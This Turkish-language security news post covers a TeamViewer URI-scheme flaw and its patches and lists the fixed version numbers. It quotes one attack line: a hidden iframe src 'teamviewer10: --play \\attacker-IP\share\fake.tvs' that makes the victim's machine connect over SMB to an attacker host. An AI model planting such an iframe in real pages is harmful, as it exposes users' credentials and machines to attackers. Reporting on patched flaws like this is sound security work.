Bu zafiyeti kullanmak için saldırganların zararlı kod içeren bir web sayfası hazırlaması gerekiyor. Hazırlanan web sayfasına saldırganın istediği zararlı kodu içeren gizli veya 1 piksel gibi çok küçük boyutlarda bir iframe elemanı yerleştirilerek kullanıcıya fark ettirilmeden zararlı kodun çalışması sağlanıyor.

Yukarıdaki gibi kullanıcı tarafından fark edilemeyecek boyutta olan iframe elemanının src özelliğine yerleştirilen ‘teamviewer10: –play \\attacker-IP\share\fake.tvs’.  kodu  ile “URI Scheme” kullanılarak hedef bilgisayarda bulunan Teamviewer client uygulamasının çalışması sağlanıyor. İlgili iframe içerisinde bulunan link, hedef bilgisayarın SMB protokolünü kullanarak linkte bulunan saldırgana ait ip adresine bağlanmasını sağlıyor.

İlk bağlantı isteğini gönderen hedef makine olduğu ve SMB paylaşımı kullanıldığı için saldırgan tarafından kullanıcının parolasına ihtiyaç kalmadan hedef bilgisayara erişim sağlanabiliyor.

Zafiyeti keşfeden Praetorian firması güvenlik mühendisi Jeffrey Hofmann’a göre ilgili açık birçok Teamviewer versiyonunda kullanılabilir. Açığın birçok versiyonda bulunduğunu teyit eden Teamviewer firması konuyla ilgili Teamviewer 8 ile 15 sürümü arasındaki tüm sürümler için güvenlik güncellemesi yayımladı. Teamviewer konuyla ilgili açıklamasında ayrıca zafiyeti bulup firma ile paylaşan Jeffrey Hofmann’a teşekkür etti. Windows kullanıcılarının Teamviewer uygulamalarını yama uygulanan versiyonlardan birine yükseltmeleri tavsiye ediliyor. Güvenli versiyon numaralarının listesi şu şekilde: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 ve 15.8.3.

Kaynak    

The post Teamviewer Kritik Güvenlik Açığını Kapattı appeared first on ÇözümPark.

Viewing all 4130 articles
Browse latest View live